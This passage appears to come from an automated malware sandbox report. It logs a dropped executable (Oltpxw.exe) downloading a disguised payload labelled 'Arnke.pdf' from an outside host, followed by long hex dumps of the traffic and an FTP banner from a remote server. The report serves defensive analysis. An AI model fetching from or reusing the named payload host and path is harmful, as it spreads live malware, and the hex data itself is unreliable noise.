                                              Data Ascii: G2N08l`LkX]S dupK%554ai>Hn4Em:x#!4jJ}P/6'WMpZVCgY4imJJLh8^1SD%4%/uq/&oe[{)b$9F\KO/R/)/&:,[
                                              2024-10-10 08:00:14 UTC8000INData Raw: a5 5c 97 d2 70 76 91 5d 27 dd 5c 6e fa 1c ea 03 30 4e 98 53 4e 95 de ba 5b 18 36 af 0c dd 1c b6 a0 6d 2a 8f 52 60 8f 40 c7 ee 19 67 7e dd 1a 00 9d f2 65 01 57 ab 96 f9 d7 e3 92 70 a6 1e 8e 35 96 9a 2b e0 83 37 e3 6e 68 b0 7c 3a c3 d3 25 8c 12 c8 01 d1 2a 2e 12 50 40 6b ca 4d 58 e2 85 9a 4e ec 4d 6b 71 ee fd d2 76 f9 88 24 c7 ee 2e 7b e2 23 ba 8d 33 2a da 60 7a 3f 1a 9c 1b 93 a5 a3 26 a8 0c 15 1f 72 1b c2 40 b3 64 d7 c2 67 eb 84 69 29 c0 73 b7 3a 78 11 99 31 92 32 1a 3d c0 57 4e e2 7b 02 e3 48 72 41 76 b6 19 00 90 9d a3 85 41 c6 d4 06 a4 1d 25 65 96 a3 c8 41 aa ff e9 d9 36 cc a0 7d 67 ad c8 d6 16 4e 6e da 39 53 01 6d 88 56 f6 85 08 2d 8d 26 aa 8d 75 52 bf 4b 7f 4f 4a ff 90 d0 71 a8 7b db 0a ba a3 65 27 61 24 5e 44 5f 7d 41 c0 c5 5f 73 f9 30 19 02 72 5c fe
                                              Data Ascii: \pv]'\n0NSN[6m*R`@g~eWp5+7nh|:%*.P@kMXNMkqv$.{#3*`z?&r@dgi)s:x12=WN{HrAvA%eA6}gNn9SmV-&uRKOJq{e'a$^D_}A_s0r\
                                              2024-10-10 08:00:14 UTC8000INData Raw: cb 47 80 d1 d5 74 a5 ce 9a ce 9e 5b 71 2e e0 59 a2 35 60 54 b6 a7 13 ac a2 fa f2 2d 77 ac 0e 44 d6 c2 4b 32 ae 11 33 71 2f e1 db 8a 99 34 1a ad 8c 70 cf dd a9 a6 c6 a9 16 cb 9d dc 27 7b 5f 4a ff 7d 2e f2 ff 98 a1 2b e8 a9 fe 39 53 2e 65 f4 ec 21 57 95 37 c6 91 c3 13 45 36 dd 57 20 f4 5e 49 fa 23 3b 5b d9 50 48 6c 3e 26 d5 cf 4b bc 1f 92 bf 61 aa 03 6c 3d ac 91 f2 f1 fd 89 ed e0 71 14 72 56 f0 da 52 70 e6 76 95 9d b2 02 e7 50 29 1d aa e4 a6 d1 3e db de 51 44 01 06 ed de 4a e8 59 7c ee 35 6e 95 a9 6b 26 3a 3a 40 e3 80 01 7a fb a6 66 62 34 99 7f 60 a9 b1 d3 82 37 e4 df 38 81 6a 1b c8 57 51 77 39 c7 83 e4 62 87 b4 9a c0 84 b6 87 21 1f 6d 64 d0 b2 c4 bd 4b e1 6c 32 35 63 d0 61 e6 a9 fb c4 13 c8 1a 57 7c ab c7 01 5d ff d8 84 a9 17 16 82 e6 c9 83 18 ef 4b f5 01
                                              Data Ascii: Gt[q.Y5`T-wDK23q/4p'{_J}.+9S.e!W7E6W ^I#;[PHl>&Kal=qrVRpvP)>QDJY|5nk&::@zfb4`78jWQw9b!mdKl25caW|]K
                                              2024-10-10 08:00:14 UTC8000INData Raw: 53 f3 c6 d1 7e 41 a4 94 b3 98 ff cb 9b 5c 16 9f 15 a1 b6 41 90 ed 14 02 11 ed 0d 1a 72 83 7b 57 48 87 02 48 9b 06 37 37 27 2c df f5 4c bc 08 2a 54 25 d7 c3 0e cc 10 b0 ef 97 95 dc 50 7e 68 95 ce 09 91 f1 9c c2 cc a3 bc 86 3f 68 9f 44 66 1e 77 0f b2 c5 f1 3f f3 13 ae 45 1c a4 e4 5d a9 4f 2f c7 94 34 b4 51 50 87 44 5e 41 0a 8f 40 51 62 28 cd de 6f 45 48 e8 03 e6 80 c3 bc f0 d1 38 00 b0 f9 cd 28 3e 45 81 af fb 70 02 dd 37 2f dd 94 8a b7 95 0a 58 8e f9 a3 23 91 e0 3e f5 3d 4e 8f 6f c5 2c d6 28 31 93 19 3b 01 72 7d 0c 38 af 52 d2 b8 e8 96 7b a8 d0 f1 b8 54 5a bf b7 28 d5 41 df 6b de 89 67 f4 4a 82 34 af 34 14 77 2e 1b 21 14 e5 7b f4 09 c9 16 7a ab 74 b7 e2 89 a6 c0 64 ae 36 0b 01 0c 1f 67 fd e6 37 dc b2 5d 9e 56 21 f1 e2 75 e4 8e fb 8b 4d 7b ef 5c ef 0c e9 86
                                              Data Ascii: S~A\Ar{WHH77',L*T%P~h?hDfw?E]O/4QPD^A@Qb(oEH8(>Ep7/X#>=No,(1;r}8R{TZ(AkgJ44w.!{ztd6g7]V!uM{\
                                              2024-10-10 08:00:14 UTC8000INData Raw: e1 26 77 ee f9 43 bd ee 3d c1 b6 c4 1e fe 0b 3d 39 0d a9 f4 7c e0 f6 e3 94 fb 8a 1f 3e 49 33 7f 47 93 5f 6f 0c 72 6d 1d d7 f7 38 c0 6c 1c 4d 56 a4 90 54 38 2e b3 d8 7f 84 30 6c 8f a9 11 2e ce 78 19 84 9e e4 f8 0b c5 75 7b 91 59 fe 7f be bf a0 8a b6 35 97 20 5e 61 1a e4 72 56 c4 d7 61 cb 4e c3 27 12 fc a8 26 b1 19 b3 aa 5c 5c 5e b4 e4 ad c7 2c 7a ff 47 04 de 88 5d cc 04 d5 11 c9 99 49 ca 1b 1e 4e d6 34 b6 81 1c ca 34 cc 8c 04 c1 16 90 be 2d 43 fb b3 22 fa 67 69 92 cc 86 98 11 17 3c 13 d0 54 c2 29 71 b4 cb 1b ea c9 46 b8 4e 33 d5 5f 6d 87 8b ca 81 6a 0b 9b fb 15 8c 5d 5c eb b7 45 13 e8 a6 d2 7b 5d d8 7b 85 72 f7 35 99 01 31 a1 65 92 5b b0 91 da 4c 2c 7f d8 a2 09 05 8c 8a 88 4d 07 01 7f 97 25 2d d6 f2 e6 2a 29 97 1c 55 77 66 c6 10 fb 08 5a d0 08 fa 30 57 d7
                                              Data Ascii: &wC==9|>I3G_orm8lMVT8.0l.xu{Y5 ^arVaN'&\\^,zG]IN44-C"gi<T)qFN3_mj]\E{]{r51e[L,M%-*)UwfZ0W
                                              2024-10-10 08:00:14 UTC8000INData Raw: 15 0c 6f 02 7c 61 9f 84 94 6d 40 47 c9 77 85 e1 fb b0 3c b2 f2 7e a1 85 05 d2 3e f5 b2 a0 88 14 25 66 aa cc 33 1a ab 53 79 a9 ad 80 a9 16 2b 17 03 0f 9f 2a ba aa 03 96 b8 51 7b 68 4a ec 8f d2 fa d9 7e cd 16 4c a5 60 0b 11 62 75 35 2e 45 5e 99 30 87 6a d0 63 95 4b 11 05 0b 8b 3f 41 22 7c 6f 7f 73 38 59 ad 78 09 ee 0e 07 b2 82 bc 60 74 64 28 be 0b cc bb af 9f d5 eb 24 5d 20 4c 40 b6 88 1b 92 2c c1 ba 90 4b 7c 7d 05 f3 03 1b d4 33 26 0c d1 0e 20 1f 74 02 0b fe 48 a8 39 d9 40 f1 03 d8 b6 04 92 e9 4c 69 70 28 02 2d 54 8e db ad 3c ba 7d bb c7 84 78 8c 19 a5 89 19 15 49 f3 fc 9b 61 88 0b 88 fb e3 87 dd c3 b8 d8 b5 05 de 83 5d d0 e4 fb 21 c6 4f 16 14 a2 55 0b 5c 3b b6 37 04 2e a7 1d 34 3c 1e 61 55 47 f2 37 8c 2d 62 0a 41 59 fd 0f 16 37 ec d6 2e 4e 89 77 3b 1f 40
                                              Data Ascii: o|am@Gw<~>%f3Sy+*Q{hJ~L`bu5.E^0jcK?A"|os8Yx`td($] L@,K|}3& tH9@Lip(-T<}xIa]!OU\;7.4<aUG7-bAY7.Nw;@
                                              2024-10-10 08:00:14 UTC8000INData Raw: 65 27 13 61 45 aa 90 5e 11 68 16 b0 c6 dc db 95 82 68 6f 35 ba 28 11 7d 81 c9 fc 0f b9 c2 8b 94 79 97 80 0e 67 62 7d 67 a6 c4 c4 ff a0 64 28 45 e2 04 9a 9e 06 74 70 d3 5c 64 ee 9a 8d 08 c0 43 a0 2e c6 47 4e c3 42 60 d9 fc f7 85 9d f6 c6 e3 79 87 bc 2d 58 42 7c df 0a 9a 64 d7 47 bf 71 ee f4 84 64 74 99 02 0e 42 4c df 3a 50 5a 02 b9 16 1f e4 cc 23 88 6a f2 ad 6f 62 56 6a fc 72 8b 4a bd 77 69 06 db 52 4b 12 57 46 e6 ec 51 e1 66 e5 be 1d 2c 26 ae d8 f8 52 b9 68 3d bb 62 a6 10 aa cf ee 74 c5 87 68 09 60 96 6f 01 33 bb fa 8a 7c bb 8e d0 5c 64 fc 65 ef dc 0e 7c 8f cd c0 15 0a ea e3 07 41 12 b8 b4 98 8a 66 7a 7a b5 10 f5 0e 49 0e 44 37 ae 45 b3 4d e2 70 7a f9 b1 1d 83 fb 2b 4c eb d9 61 f8 07 2c 3f 08 b1 11 28 52 50 34 58 02 96 60 f9 5b f6 01 36 72 82 da 8c e7 4d
                                              Data Ascii: e'aE^hho5(}ygb}gd(Etp\dC.GNB`y-XB|dGqdtBL:PZ#jobVjrJwiRKWFQf,&Rh=bth`o3|\de|AfzzID7EMpz+La,?(RP4X`[6rM
                                              2024-10-10 08:00:14 UTC8000INData Raw: ce a3 d3 2f 00 2b d6 03 90 a0 78 43 0d ec fd 4d a4 90 4e 5e a4 72 d4 0b 8d 13 d4 d6 70 7c 81 e4 1b 59 25 db 8e 5d c4 a6 4b c3 35 18 d6 98 a8 95 d3 ed 62 41 62 8b 44 0c 6e 1a b7 92 1c 54 7f 49 59 f6 79 48 af f0 ec 11 60 48 6f 92 ce 3b ec e4 05 af 4b bc e8 62 e6 f9 2e 0e e8 a4 24 27 ec 2c f4 06 33 6c 22 73 a6 3d bf 2c 9a cc 45 df 2a 3c aa c3 32 57 dc ce 9c a6 57 ba a7 a8 fd 50 2d fd e6 6d fc c8 6d d6 52 b3 19 db 6f f5 f9 9e 44 0b 42 c3 37 f8 c4 29 64 de c8 7d 5c a5 19 e6 e5 bf 47 67 23 cb e9 7c 70 44 4b 6c b3 aa 13 82 80 f5 35 ee f2 59 8d fe a4 b5 49 79 3a 3f 89 6c 37 24 a3 93 08 d8 d1 43 0b 94 eb 96 f9 43 55 0d 42 43 be 27 70 47 8d 63 b3 f1 f1 ac df 48 a3 30 8a 85 53 4c 28 01 13 fc 2a ce 58 0e c4 6f 98 3a 66 cf 80 80 99 38 fa 6a 0e 60 2f 4f 58 0e b5 6f 41
                                              Data Ascii: /+xCMN^rp|Y%]K5bAbDnTIYyH`Ho;Kb.$',3l"s=,E*<2WWP-mmRoDB7)d}\Gg#|pDKl5YIy:?l7$CCUBC'pGcH0SL(*Xo:f8j`/OXoA
                                              2024-10-10 08:00:14 UTC8000INData Raw: 3b 40 8d 58 9c 7c 63 5c f1 fd b0 ab 40 04 97 3a 5e 74 3b 40 92 1a 12 6f 74 e7 ee 50 5b 2c 1a fb 36 09 1a 37 43 f8 22 21 ff b7 95 f7 1a b8 68 65 13 eb af c3 6a d2 ed 6a 65 df b5 53 23 82 a3 99 0c 47 cd c4 65 8a ea ae 7a 0f ff 4b 62 6d c6 18 ef 12 14 52 1c 5a 8e f3 07 4f f7 a8 6b ac da 61 ab f0 04 97 70 7e 0d de 37 72 33 29 fb 19 8f df 90 db 06 d2 0f 8e 7d 6b e7 7a 5e 50 62 da b9 81 86 c7 14 89 e5 9a 99 d4 12 35 89 f7 fa f4 46 78 53 d4 61 85 75 90 3e cf fb 84 56 f3 c9 69 52 9e 32 11 1b 27 7f df 6a 07 2c aa 5b ff bb f2 5e 8c 24 cd 37 06 e8 14 5a 78 eb d5 18 f6 20 2f 76 d9 a8 9d 66 78 25 f4 f7 24 0a fa d7 e2 92 81 3f a1 7d e3 84 cd 19 20 52 a8 ce 1e 3b fa 5e ff a6 09 b2 47 c3 4c e6 83 a6 01 fb 16 46 41 53 55 8b 29 ea 24 b3 5a 65 f3 6d df aa e0 9d 94 03 83 4d
                                              Data Ascii: ;@X|c\@:^t;@otP[,67C"!hejjeS#GezKbmRZOkap~7r3)}kz^Pb5FxSau>ViR2'j,[^$7Zx /vfx%$?} R;^GLFASU)$ZemM
                                              2024-10-10 08:00:14 UTC8000INData Raw: ea c3 a0 f9 7e fa b6 40 98 d8 e0 96 96 72 e3 fb 3f b7 e0 7e 5e d5 ba 90 2f c5 f3 3b a0 94 e1 69 29 54 bf 6f f9 58 1b 48 c7 cf 9d 30 a7 46 d8 72 2f 32 16 be 5a eb f2 b5 ef d9 a0 2b 42 f5 6d 9f 72 47 dd f3 8e 81 de 69 54 fb 61 99 66 2e be 5c 97 31 06 c7 df 08 90 f6 5a 8e 9c a3 2e a3 b8 c4 0e 60 5f aa 82 b9 6c ab 19 3a ca b0 37 a6 20 4a 26 6d 8f 57 96 6f 6c 5f 98 cf 59 25 aa c2 83 41 75 1a aa 04 0d d2 33 44 87 ac 55 3d 88 35 a9 68 17 69 16 52 b3 f0 1e a8 0d 99 fc 2a 78 84 61 1f ed 21 4e 8c 92 6d ef b9 4b 7a 5f ca 28 7b ab c1 76 8d 25 a7 41 e2 e8 60 f9 4c aa 20 08 d8 67 ab 42 b1 84 09 29 aa a6 d2 12 98 ad 22 3c ee c5 55 0e e3 ff 4c 70 60 94 e6 d8 80 74 d7 26 8c 75 15 56 fb 87 09 11 43 fc 27 9e 54 5d e8 43 72 29 2c 16 ce ec ee c5 8e 75 f3 0b 33 7b 34 45 b4 f6
                                              Data Ascii: ~@r?~^/;i)ToXH0Fr/2Z+BmrGiTaf.\1Z.`_l:7 J&mWol_Y%Au3DU=5hiR*xa!NmKz_({v%A`L gB)"<ULp`t&uVC'T]Cr),u3{4E


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.549782103.191.208.1224431524C:\Users\user\AppData\Roaming\Oltpxw.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-10 08:00:22 UTC94OUTGET /ikeawc/Arnke.pdf HTTP/1.1
                                              Host: rubberpartsmanufacturers.com
                                              Connection: Keep-Alive
                                              2024-10-10 08:00:22 UTC240INHTTP/1.1 200 OK
                                              Date: Thu, 10 Oct 2024 08:00:22 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Thu, 10 Oct 2024 04:11:44 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 960016
                                              Content-Type: application/pdf
                                              2024-10-10 08:00:22 UTC7952INData Raw: 47 be bd c9 32 ea 02 dd 4e 83 82 30 38 b8 6c 60 b1 4c c7 f0 6b c3 0c 58 18 5d 53 98 20 c8 cb 64 c1 75 97 e4 a3 70 a9 c4 89 4b b6 25 e4 c2 35 35 02 9d d4 34 ff 61 d0 bf 69 f5 0d 3e ee 13 48 e0 6e 34 d3 0c ef 45 6d 88 3a 91 78 23 fb db 87 83 94 21 9f 85 34 dc ec 6a 96 4a 7d d4 50 04 d0 e4 8f 9d be bc f2 2f 36 0b aa 27 fc d8 fa e0 8f 9a f7 0a c2 57 4d 70 5a c8 d7 0e 56 43 67 12 c4 59 34 69 86 b9 6d 85 4a f3 fb a9 f6 4a f8 12 4c 68 e2 38 fc e8 5e ae 80 97 ca 31 53 44 b8 fb d1 a1 25 1c f9 8b a4 bf eb 34 b5 7f 1d cb ad 9d b7 d6 25 2f 75 a6 e3 7f 71 c0 2f 26 b5 b6 a5 09 e0 f2 6f 65 a6 5b 0f 0f d9 9c 1d df a4 fd 7b 29 62 8d 80 24 39 46 a5 ac 5c 8e 4b c8 4f 9c db c5 a4 2f 90 f5 b9 52 80 2f 17 29 bb 1c 2f 26 3a af f5 c0 08 01 e5 8d 2c fd a1 d3 cb cc 0c b3 c4 5b ec
                                              Data Ascii: G2N08l`LkX]S dupK%554ai>Hn4Em:x#!4jJ}P/6'WMpZVCgY4imJJLh8^1SD%4%/uq/&oe[{)b$9F\KO/R/)/&:,[
                                              2024-10-10 08:00:22 UTC8000INData Raw: a5 5c 97 d2 70 76 91 5d 27 dd 5c 6e fa 1c ea 03 30 4e 98 53 4e 95 de ba 5b 18 36 af 0c dd 1c b6 a0 6d 2a 8f 52 60 8f 40 c7 ee 19 67 7e dd 1a 00 9d f2 65 01 57 ab 96 f9 d7 e3 92 70 a6 1e 8e 35 96 9a 2b e0 83 37 e3 6e 68 b0 7c 3a c3 d3 25 8c 12 c8 01 d1 2a 2e 12 50 40 6b ca 4d 58 e2 85 9a 4e ec 4d 6b 71 ee fd d2 76 f9 88 24 c7 ee 2e 7b e2 23 ba 8d 33 2a da 60 7a 3f 1a 9c 1b 93 a5 a3 26 a8 0c 15 1f 72 1b c2 40 b3 64 d7 c2 67 eb 84 69 29 c0 73 b7 3a 78 11 99 31 92 32 1a 3d c0 57 4e e2 7b 02 e3 48 72 41 76 b6 19 00 90 9d a3 85 41 c6 d4 06 a4 1d 25 65 96 a3 c8 41 aa ff e9 d9 36 cc a0 7d 67 ad c8 d6 16 4e 6e da 39 53 01 6d 88 56 f6 85 08 2d 8d 26 aa 8d 75 52 bf 4b 7f 4f 4a ff 90 d0 71 a8 7b db 0a ba a3 65 27 61 24 5e 44 5f 7d 41 c0 c5 5f 73 f9 30 19 02 72 5c fe
                                              Data Ascii: \pv]'\n0NSN[6m*R`@g~eWp5+7nh|:%*.P@kMXNMkqv$.{#3*`z?&r@dgi)s:x12=WN{HrAvA%eA6}gNn9SmV-&uRKOJq{e'a$^D_}A_s0r\
                                              2024-10-10 08:00:22 UTC8000INData Raw: cb 47 80 d1 d5 74 a5 ce 9a ce 9e 5b 71 2e e0 59 a2 35 60 54 b6 a7 13 ac a2 fa f2 2d 77 ac 0e 44 d6 c2 4b 32 ae 11 33 71 2f e1 db 8a 99 34 1a ad 8c 70 cf dd a9 a6 c6 a9 16 cb 9d dc 27 7b 5f 4a ff 7d 2e f2 ff 98 a1 2b e8 a9 fe 39 53 2e 65 f4 ec 21 57 95 37 c6 91 c3 13 45 36 dd 57 20 f4 5e 49 fa 23 3b 5b d9 50 48 6c 3e 26 d5 cf 4b bc 1f 92 bf 61 aa 03 6c 3d ac 91 f2 f1 fd 89 ed e0 71 14 72 56 f0 da 52 70 e6 76 95 9d b2 02 e7 50 29 1d aa e4 a6 d1 3e db de 51 44 01 06 ed de 4a e8 59 7c ee 35 6e 95 a9 6b 26 3a 3a 40 e3 80 01 7a fb a6 66 62 34 99 7f 60 a9 b1 d3 82 37 e4 df 38 81 6a 1b c8 57 51 77 39 c7 83 e4 62 87 b4 9a c0 84 b6 87 21 1f 6d 64 d0 b2 c4 bd 4b e1 6c 32 35 63 d0 61 e6 a9 fb c4 13 c8 1a 57 7c ab c7 01 5d ff d8 84 a9 17 16 82 e6 c9 83 18 ef 4b f5 01
                                              Data Ascii: Gt[q.Y5`T-wDK23q/4p'{_J}.+9S.e!W7E6W ^I#;[PHl>&Kal=qrVRpvP)>QDJY|5nk&::@zfb4`78jWQw9b!mdKl25caW|]K
                                              2024-10-10 08:00:22 UTC8000INData Raw: 53 f3 c6 d1 7e 41 a4 94 b3 98 ff cb 9b 5c 16 9f 15 a1 b6 41 90 ed 14 02 11 ed 0d 1a 72 83 7b 57 48 87 02 48 9b 06 37 37 27 2c df f5 4c bc 08 2a 54 25 d7 c3 0e cc 10 b0 ef 97 95 dc 50 7e 68 95 ce 09 91 f1 9c c2 cc a3 bc 86 3f 68 9f 44 66 1e 77 0f b2 c5 f1 3f f3 13 ae 45 1c a4 e4 5d a9 4f 2f c7 94 34 b4 51 50 87 44 5e 41 0a 8f 40 51 62 28 cd de 6f 45 48 e8 03 e6 80 c3 bc f0 d1 38 00 b0 f9 cd 28 3e 45 81 af fb 70 02 dd 37 2f dd 94 8a b7 95 0a 58 8e f9 a3 23 91 e0 3e f5 3d 4e 8f 6f c5 2c d6 28 31 93 19 3b 01 72 7d 0c 38 af 52 d2 b8 e8 96 7b a8 d0 f1 b8 54 5a bf b7 28 d5 41 df 6b de 89 67 f4 4a 82 34 af 34 14 77 2e 1b 21 14 e5 7b f4 09 c9 16 7a ab 74 b7 e2 89 a6 c0 64 ae 36 0b 01 0c 1f 67 fd e6 37 dc b2 5d 9e 56 21 f1 e2 75 e4 8e fb 8b 4d 7b ef 5c ef 0c e9 86
                                              Data Ascii: S~A\Ar{WHH77',L*T%P~h?hDfw?E]O/4QPD^A@Qb(oEH8(>Ep7/X#>=No,(1;r}8R{TZ(AkgJ44w.!{ztd6g7]V!uM{\
                                              2024-10-10 08:00:23 UTC8000INData Raw: e1 26 77 ee f9 43 bd ee 3d c1 b6 c4 1e fe 0b 3d 39 0d a9 f4 7c e0 f6 e3 94 fb 8a 1f 3e 49 33 7f 47 93 5f 6f 0c 72 6d 1d d7 f7 38 c0 6c 1c 4d 56 a4 90 54 38 2e b3 d8 7f 84 30 6c 8f a9 11 2e ce 78 19 84 9e e4 f8 0b c5 75 7b 91 59 fe 7f be bf a0 8a b6 35 97 20 5e 61 1a e4 72 56 c4 d7 61 cb 4e c3 27 12 fc a8 26 b1 19 b3 aa 5c 5c 5e b4 e4 ad c7 2c 7a ff 47 04 de 88 5d cc 04 d5 11 c9 99 49 ca 1b 1e 4e d6 34 b6 81 1c ca 34 cc 8c 04 c1 16 90 be 2d 43 fb b3 22 fa 67 69 92 cc 86 98 11 17 3c 13 d0 54 c2 29 71 b4 cb 1b ea c9 46 b8 4e 33 d5 5f 6d 87 8b ca 81 6a 0b 9b fb 15 8c 5d 5c eb b7 45 13 e8 a6 d2 7b 5d d8 7b 85 72 f7 35 99 01 31 a1 65 92 5b b0 91 da 4c 2c 7f d8 a2 09 05 8c 8a 88 4d 07 01 7f 97 25 2d d6 f2 e6 2a 29 97 1c 55 77 66 c6 10 fb 08 5a d0 08 fa 30 57 d7
                                              Data Ascii: &wC==9|>I3G_orm8lMVT8.0l.xu{Y5 ^arVaN'&\\^,zG]IN44-C"gi<T)qFN3_mj]\E{]{r51e[L,M%-*)UwfZ0W
                                              2024-10-10 08:00:24 UTC8000INData Raw: 15 0c 6f 02 7c 61 9f 84 94 6d 40 47 c9 77 85 e1 fb b0 3c b2 f2 7e a1 85 05 d2 3e f5 b2 a0 88 14 25 66 aa cc 33 1a ab 53 79 a9 ad 80 a9 16 2b 17 03 0f 9f 2a ba aa 03 96 b8 51 7b 68 4a ec 8f d2 fa d9 7e cd 16 4c a5 60 0b 11 62 75 35 2e 45 5e 99 30 87 6a d0 63 95 4b 11 05 0b 8b 3f 41 22 7c 6f 7f 73 38 59 ad 78 09 ee 0e 07 b2 82 bc 60 74 64 28 be 0b cc bb af 9f d5 eb 24 5d 20 4c 40 b6 88 1b 92 2c c1 ba 90 4b 7c 7d 05 f3 03 1b d4 33 26 0c d1 0e 20 1f 74 02 0b fe 48 a8 39 d9 40 f1 03 d8 b6 04 92 e9 4c 69 70 28 02 2d 54 8e db ad 3c ba 7d bb c7 84 78 8c 19 a5 89 19 15 49 f3 fc 9b 61 88 0b 88 fb e3 87 dd c3 b8 d8 b5 05 de 83 5d d0 e4 fb 21 c6 4f 16 14 a2 55 0b 5c 3b b6 37 04 2e a7 1d 34 3c 1e 61 55 47 f2 37 8c 2d 62 0a 41 59 fd 0f 16 37 ec d6 2e 4e 89 77 3b 1f 40
                                              Data Ascii: o|am@Gw<~>%f3Sy+*Q{hJ~L`bu5.E^0jcK?A"|os8Yx`td($] L@,K|}3& tH9@Lip(-T<}xIa]!OU\;7.4<aUG7-bAY7.Nw;@
                                              2024-10-10 08:00:24 UTC8000INData Raw: 65 27 13 61 45 aa 90 5e 11 68 16 b0 c6 dc db 95 82 68 6f 35 ba 28 11 7d 81 c9 fc 0f b9 c2 8b 94 79 97 80 0e 67 62 7d 67 a6 c4 c4 ff a0 64 28 45 e2 04 9a 9e 06 74 70 d3 5c 64 ee 9a 8d 08 c0 43 a0 2e c6 47 4e c3 42 60 d9 fc f7 85 9d f6 c6 e3 79 87 bc 2d 58 42 7c df 0a 9a 64 d7 47 bf 71 ee f4 84 64 74 99 02 0e 42 4c df 3a 50 5a 02 b9 16 1f e4 cc 23 88 6a f2 ad 6f 62 56 6a fc 72 8b 4a bd 77 69 06 db 52 4b 12 57 46 e6 ec 51 e1 66 e5 be 1d 2c 26 ae d8 f8 52 b9 68 3d bb 62 a6 10 aa cf ee 74 c5 87 68 09 60 96 6f 01 33 bb fa 8a 7c bb 8e d0 5c 64 fc 65 ef dc 0e 7c 8f cd c0 15 0a ea e3 07 41 12 b8 b4 98 8a 66 7a 7a b5 10 f5 0e 49 0e 44 37 ae 45 b3 4d e2 70 7a f9 b1 1d 83 fb 2b 4c eb d9 61 f8 07 2c 3f 08 b1 11 28 52 50 34 58 02 96 60 f9 5b f6 01 36 72 82 da 8c e7 4d
                                              Data Ascii: e'aE^hho5(}ygb}gd(Etp\dC.GNB`y-XB|dGqdtBL:PZ#jobVjrJwiRKWFQf,&Rh=bth`o3|\de|AfzzID7EMpz+La,?(RP4X`[6rM
                                              2024-10-10 08:00:24 UTC8000INData Raw: ce a3 d3 2f 00 2b d6 03 90 a0 78 43 0d ec fd 4d a4 90 4e 5e a4 72 d4 0b 8d 13 d4 d6 70 7c 81 e4 1b 59 25 db 8e 5d c4 a6 4b c3 35 18 d6 98 a8 95 d3 ed 62 41 62 8b 44 0c 6e 1a b7 92 1c 54 7f 49 59 f6 79 48 af f0 ec 11 60 48 6f 92 ce 3b ec e4 05 af 4b bc e8 62 e6 f9 2e 0e e8 a4 24 27 ec 2c f4 06 33 6c 22 73 a6 3d bf 2c 9a cc 45 df 2a 3c aa c3 32 57 dc ce 9c a6 57 ba a7 a8 fd 50 2d fd e6 6d fc c8 6d d6 52 b3 19 db 6f f5 f9 9e 44 0b 42 c3 37 f8 c4 29 64 de c8 7d 5c a5 19 e6 e5 bf 47 67 23 cb e9 7c 70 44 4b 6c b3 aa 13 82 80 f5 35 ee f2 59 8d fe a4 b5 49 79 3a 3f 89 6c 37 24 a3 93 08 d8 d1 43 0b 94 eb 96 f9 43 55 0d 42 43 be 27 70 47 8d 63 b3 f1 f1 ac df 48 a3 30 8a 85 53 4c 28 01 13 fc 2a ce 58 0e c4 6f 98 3a 66 cf 80 80 99 38 fa 6a 0e 60 2f 4f 58 0e b5 6f 41
                                              Data Ascii: /+xCMN^rp|Y%]K5bAbDnTIYyH`Ho;Kb.$',3l"s=,E*<2WWP-mmRoDB7)d}\Gg#|pDKl5YIy:?l7$CCUBC'pGcH0SL(*Xo:f8j`/OXoA
                                              2024-10-10 08:00:24 UTC8000INData Raw: 3b 40 8d 58 9c 7c 63 5c f1 fd b0 ab 40 04 97 3a 5e 74 3b 40 92 1a 12 6f 74 e7 ee 50 5b 2c 1a fb 36 09 1a 37 43 f8 22 21 ff b7 95 f7 1a b8 68 65 13 eb af c3 6a d2 ed 6a 65 df b5 53 23 82 a3 99 0c 47 cd c4 65 8a ea ae 7a 0f ff 4b 62 6d c6 18 ef 12 14 52 1c 5a 8e f3 07 4f f7 a8 6b ac da 61 ab f0 04 97 70 7e 0d de 37 72 33 29 fb 19 8f df 90 db 06 d2 0f 8e 7d 6b e7 7a 5e 50 62 da b9 81 86 c7 14 89 e5 9a 99 d4 12 35 89 f7 fa f4 46 78 53 d4 61 85 75 90 3e cf fb 84 56 f3 c9 69 52 9e 32 11 1b 27 7f df 6a 07 2c aa 5b ff bb f2 5e 8c 24 cd 37 06 e8 14 5a 78 eb d5 18 f6 20 2f 76 d9 a8 9d 66 78 25 f4 f7 24 0a fa d7 e2 92 81 3f a1 7d e3 84 cd 19 20 52 a8 ce 1e 3b fa 5e ff a6 09 b2 47 c3 4c e6 83 a6 01 fb 16 46 41 53 55 8b 29 ea 24 b3 5a 65 f3 6d df aa e0 9d 94 03 83 4d
                                              Data Ascii: ;@X|c\@:^t;@otP[,67C"!hejjeS#GezKbmRZOkap~7r3)}kz^Pb5FxSau>ViR2'j,[^$7Zx /vfx%$?} R;^GLFASU)$ZemM
                                              2024-10-10 08:00:24 UTC8000INData Raw: ea c3 a0 f9 7e fa b6 40 98 d8 e0 96 96 72 e3 fb 3f b7 e0 7e 5e d5 ba 90 2f c5 f3 3b a0 94 e1 69 29 54 bf 6f f9 58 1b 48 c7 cf 9d 30 a7 46 d8 72 2f 32 16 be 5a eb f2 b5 ef d9 a0 2b 42 f5 6d 9f 72 47 dd f3 8e 81 de 69 54 fb 61 99 66 2e be 5c 97 31 06 c7 df 08 90 f6 5a 8e 9c a3 2e a3 b8 c4 0e 60 5f aa 82 b9 6c ab 19 3a ca b0 37 a6 20 4a 26 6d 8f 57 96 6f 6c 5f 98 cf 59 25 aa c2 83 41 75 1a aa 04 0d d2 33 44 87 ac 55 3d 88 35 a9 68 17 69 16 52 b3 f0 1e a8 0d 99 fc 2a 78 84 61 1f ed 21 4e 8c 92 6d ef b9 4b 7a 5f ca 28 7b ab c1 76 8d 25 a7 41 e2 e8 60 f9 4c aa 20 08 d8 67 ab 42 b1 84 09 29 aa a6 d2 12 98 ad 22 3c ee c5 55 0e e3 ff 4c 70 60 94 e6 d8 80 74 d7 26 8c 75 15 56 fb 87 09 11 43 fc 27 9e 54 5d e8 43 72 29 2c 16 ce ec ee c5 8e 75 f3 0b 33 7b 34 45 b4 f6
                                              Data Ascii: ~@r?~^/;i)ToXH0Fr/2Z+BmrGiTaf.\1Z.`_l:7 J&mWol_Y%Au3DU=5hiR*xa!NmKz_({v%A`L gB)"<ULp`t&uVC'T]Cr),u3{4E


                                              FTP Packets

                                              TimestampSource PortDest PortSource IPDest IPCommands
                                              Oct 10, 2024 10:00:02.729294062 CEST21497055.2.84.236192.168.2.5220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
